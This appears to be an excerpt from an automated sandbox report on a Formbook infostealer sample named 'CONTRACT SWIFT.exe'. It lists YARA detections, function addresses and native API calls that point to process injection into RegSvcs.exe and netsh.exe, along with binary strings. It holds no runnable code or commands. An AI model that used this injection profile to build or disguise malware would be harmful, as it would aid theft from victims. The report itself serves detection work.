Source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_004181C0 NtCreateFile,	5_2_004181C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00418270 NtReadFile,	5_2_00418270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_004182F0 NtClose,	5_2_004182F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_004183A0 NtAllocateVirtualMemory,	5_2_004183A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_004181BA NtCreateFile,	5_2_004181BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041826A NtReadFile,	5_2_0041826A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_004182EA NtClose,	5_2_004182EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041839C NtAllocateVirtualMemory,	5_2_0041839C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619910 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_01619910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016199A0 NtCreateSection,LdrInitializeThunk,	5_2_016199A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619860 NtQuerySystemInformation,LdrInitializeThunk,	5_2_01619860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619840 NtDelayExecution,LdrInitializeThunk,	5_2_01619840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016198F0 NtReadVirtualMemory,LdrInitializeThunk,	5_2_016198F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619A50 NtCreateFile,LdrInitializeThunk,	5_2_01619A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619A20 NtResumeThread,LdrInitializeThunk,	5_2_01619A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619A00 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_01619A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619540 NtReadFile,LdrInitializeThunk,	5_2_01619540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016195D0 NtClose,LdrInitializeThunk,	5_2_016195D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619710 NtQueryInformationToken,LdrInitializeThunk,	5_2_01619710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619FE0 NtCreateMutant,LdrInitializeThunk,	5_2_01619FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016197A0 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_016197A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619780 NtMapViewOfSection,LdrInitializeThunk,	5_2_01619780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619660 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_01619660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016196E0 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_016196E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619950 NtQueueApcThread,	5_2_01619950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016199D0 NtCreateProcessEx,	5_2_016199D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0161B040 NtSuspendThread,	5_2_0161B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619820 NtEnumerateKey,	5_2_01619820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016198A0 NtWriteVirtualMemory,	5_2_016198A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619B00 NtSetValueKey,	5_2_01619B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0161A3B0 NtGetContextThread,	5_2_0161A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619A10 NtQuerySection,	5_2_01619A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619A80 NtOpenDirectoryObject,	5_2_01619A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619560 NtWriteFile,	5_2_01619560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619520 NtWaitForSingleObject,	5_2_01619520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0161AD30 NtSetContextThread,	5_2_0161AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016195F0 NtQueryInformationFile,	5_2_016195F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619760 NtOpenProcess,	5_2_01619760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619770 NtSetInformationFile,	5_2_01619770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0161A770 NtOpenThread,	5_2_0161A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619730 NtQueryVirtualMemory,	5_2_01619730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0161A710 NtOpenProcessToken,	5_2_0161A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619670 NtQueryInformationProcess,	5_2_01619670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619650 NtQueryValueKey,	5_2_01619650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01619610 NtEnumerateValueKey,	5_2_01619610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016196D0 NtCreateKey,	5_2_016196D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9A50 NtCreateFile,LdrInitializeThunk,	10_2_037B9A50
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	10_2_037B9910
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B99A0 NtCreateSection,LdrInitializeThunk,	10_2_037B99A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9860 NtQuerySystemInformation,LdrInitializeThunk,	10_2_037B9860
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9840 NtDelayExecution,LdrInitializeThunk,	10_2_037B9840
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9710 NtQueryInformationToken,LdrInitializeThunk,	10_2_037B9710
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9FE0 NtCreateMutant,LdrInitializeThunk,	10_2_037B9FE0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9780 NtMapViewOfSection,LdrInitializeThunk,	10_2_037B9780
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B96E0 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_037B96E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B96D0 NtCreateKey,LdrInitializeThunk,	10_2_037B96D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9540 NtReadFile,LdrInitializeThunk,	10_2_037B9540
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B95D0 NtClose,LdrInitializeThunk,	10_2_037B95D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9B00 NtSetValueKey,	10_2_037B9B00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037BA3B0 NtGetContextThread,	10_2_037BA3B0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9A20 NtResumeThread,	10_2_037B9A20
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9A10 NtQuerySection,	10_2_037B9A10
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9A00 NtProtectVirtualMemory,	10_2_037B9A00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9A80 NtOpenDirectoryObject,	10_2_037B9A80
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9950 NtQueueApcThread,	10_2_037B9950
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B99D0 NtCreateProcessEx,	10_2_037B99D0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037BB040 NtSuspendThread,	10_2_037BB040
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9820 NtEnumerateKey,	10_2_037B9820
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B98F0 NtReadVirtualMemory,	10_2_037B98F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B98A0 NtWriteVirtualMemory,	10_2_037B98A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9770 NtSetInformationFile,	10_2_037B9770
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037BA770 NtOpenThread,	10_2_037BA770
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9760 NtOpenProcess,	10_2_037B9760
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9730 NtQueryVirtualMemory,	10_2_037B9730
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037BA710 NtOpenProcessToken,	10_2_037BA710
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B97A0 NtUnmapViewOfSection,	10_2_037B97A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9670 NtQueryInformationProcess,	10_2_037B9670
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9660 NtAllocateVirtualMemory,	10_2_037B9660
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9650 NtQueryValueKey,	10_2_037B9650
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9610 NtEnumerateValueKey,	10_2_037B9610
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9560 NtWriteFile,	10_2_037B9560
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037BAD30 NtSetContextThread,	10_2_037BAD30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B9520 NtWaitForSingleObject,	10_2_037B9520
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037B95F0 NtQueryInformationFile,	10_2_037B95F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03148270 NtReadFile,	10_2_03148270
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_031482F0 NtClose,	10_2_031482F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_031481C0 NtCreateFile,	10_2_031481C0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0314826A NtReadFile,	10_2_0314826A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_031482EA NtClose,	10_2_031482EA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_031481BA NtCreateFile,	10_2_031481BA

Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0286B52C	1_2_0286B52C
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0286E310	1_2_0286E310
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0286C8A8	1_2_0286C8A8
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_02869670	1_2_02869670
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4AAA48	1_2_0B4AAA48
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A9220	1_2_0B4A9220
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A6A98	1_2_0B4A6A98
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A7968	1_2_0B4A7968
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A59B8	1_2_0B4A59B8
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A6418	1_2_0B4A6418
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A5CE8	1_2_0B4A5CE8
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A7BD3	1_2_0B4A7BD3
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A7B85	1_2_0B4A7B85
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A7B9F	1_2_0B4A7B9F
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A7B93	1_2_0B4A7B93
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A6A88	1_2_0B4A6A88
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A7957	1_2_0B4A7957
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A1919	1_2_0B4A1919
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A1920	1_2_0B4A1920
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A59A9	1_2_0B4A59A9
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A401F	1_2_0B4A401F
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A20E1	1_2_0B4A20E1
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A20F0	1_2_0B4A20F0
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A0FB8	1_2_0B4A0FB8
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A6E61	1_2_0B4A6E61
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A6E70	1_2_0B4A6E70
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A3677	1_2_0B4A3677
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A3688	1_2_0B4A3688
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A3D6F	1_2_0B4A3D6F
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A1DC1	1_2_0B4A1DC1
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A1DD0	1_2_0B4A1DD0
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A7589	1_2_0B4A7589
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A3D80	1_2_0B4A3D80
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A7598	1_2_0B4A7598
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A6408	1_2_0B4A6408
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A7C2A	1_2_0B4A7C2A
Source: C:\Users\user\Desktop\CONTRACT SWIFT.exe	Code function: 1_2_0B4A5CD8	1_2_0B4A5CD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041CB1E	5_2_0041CB1E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00408C60	5_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00408C1A	5_2_00408C1A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041BC82	5_2_0041BC82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041C52C	5_2_0041C52C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0041B5A2	5_2_0041B5A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015DF900	5_2_015DF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F4120	5_2_015F4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F99BF	5_2_015F99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016AE824	5_2_016AE824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01691002	5_2_01691002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA830	5_2_015FA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A28EC	5_2_016A28EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016020A0	5_2_016020A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A20A8	5_2_016A20A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015EB090	5_2_015EB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FAB40	5_2_015FAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0167CB4F	5_2_0167CB4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A2B28	5_2_016A2B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FA309	5_2_015FA309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016823E3	5_2_016823E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016903DA	5_2_016903DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160ABD8	5_2_0160ABD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0169DBD2	5_2_0169DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FEB9A	5_2_015FEB9A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160EBB0	5_2_0160EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0160138B	5_2_0160138B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0168FA2B	5_2_0168FA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB236	5_2_015FB236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694AEF	5_2_01694AEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A22AE	5_2_016A22AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A1D55	5_2_016A1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A2D07	5_2_016A2D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015D0D20	5_2_015D0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A25DD	5_2_016A25DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015ED5E0	5_2_015ED5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01602581	5_2_01602581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01692D82	5_2_01692D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0169D466	5_2_0169D466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015FB477	5_2_015FB477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015E841F	5_2_015E841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_01694496	5_2_01694496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A1FF1	5_2_016A1FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016ADFCE	5_2_016ADFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_015F6E30	5_2_015F6E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_0169D616	5_2_0169D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_016A2EF7	5_2_016A2EF7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0379AB40	10_2_0379AB40
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0383DBD2	10_2_0383DBD2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_038303DA	10_2_038303DA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03842B28	10_2_03842B28
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037AEBB0	10_2_037AEBB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_038422AE	10_2_038422AE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0382FA2B	10_2_0382FA2B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03794120	10_2_03794120
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0377F900	10_2_0377F900
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037999BF	10_2_037999BF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_038420A8	10_2_038420A8
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0379A830	10_2_0379A830
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_038428EC	10_2_038428EC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03831002	10_2_03831002
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0384E824	10_2_0384E824
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037A20A0	10_2_037A20A0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0378B090	10_2_0378B090
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0384DFCE	10_2_0384DFCE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03841FF1	10_2_03841FF1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03796E30	10_2_03796E30
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03842EF7	10_2_03842EF7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0383D616	10_2_0383D616
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03770D20	10_2_03770D20
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_038425DD	10_2_038425DD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03842D07	10_2_03842D07
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0378D5E0	10_2_0378D5E0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03841D55	10_2_03841D55
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_037A2581	10_2_037A2581
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0378841F	10_2_0378841F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0383D466	10_2_0383D466
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0314CB1E	10_2_0314CB1E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03132FB0	10_2_03132FB0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0314C52C	10_2_0314C52C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03132D90	10_2_03132D90
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0314B5A2	10_2_0314B5A2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03138C1A	10_2_03138C1A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_03138C60	10_2_03138C60
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 10_2_0314BC82	10_2_0314BC82

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 015DB150 appears 139 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 0377B150 appears 72 times

Source: CONTRACT SWIFT.exe, 00000001.00000002.332084376.000000000BA80000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs CONTRACT SWIFT.exe
Source: CONTRACT SWIFT.exe, 00000001.00000002.326975810.0000000000C2B000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs CONTRACT SWIFT.exe
Source: CONTRACT SWIFT.exe, 00000001.00000002.326651186.0000000000570000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameDictionaryBase.exe^ vs CONTRACT SWIFT.exe
Source: CONTRACT SWIFT.exe, 00000001.00000002.327760082.0000000002A96000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameCutsAttr.dllH vs CONTRACT SWIFT.exe
Source: CONTRACT SWIFT.exe, 00000001.00000002.331608159.00000000058F0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDSASignature.dll@ vs CONTRACT SWIFT.exe
Source: CONTRACT SWIFT.exe, 00000001.00000002.333035563.000000000BB80000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs CONTRACT SWIFT.exe
Source: CONTRACT SWIFT.exe, 00000001.00000002.333035563.000000000BB80000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs CONTRACT SWIFT.exe
Source: CONTRACT SWIFT.exe	Binary or memory string: OriginalFilenameDictionaryBase.exe^ vs CONTRACT SWIFT.exe

Source: CONTRACT SWIFT.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

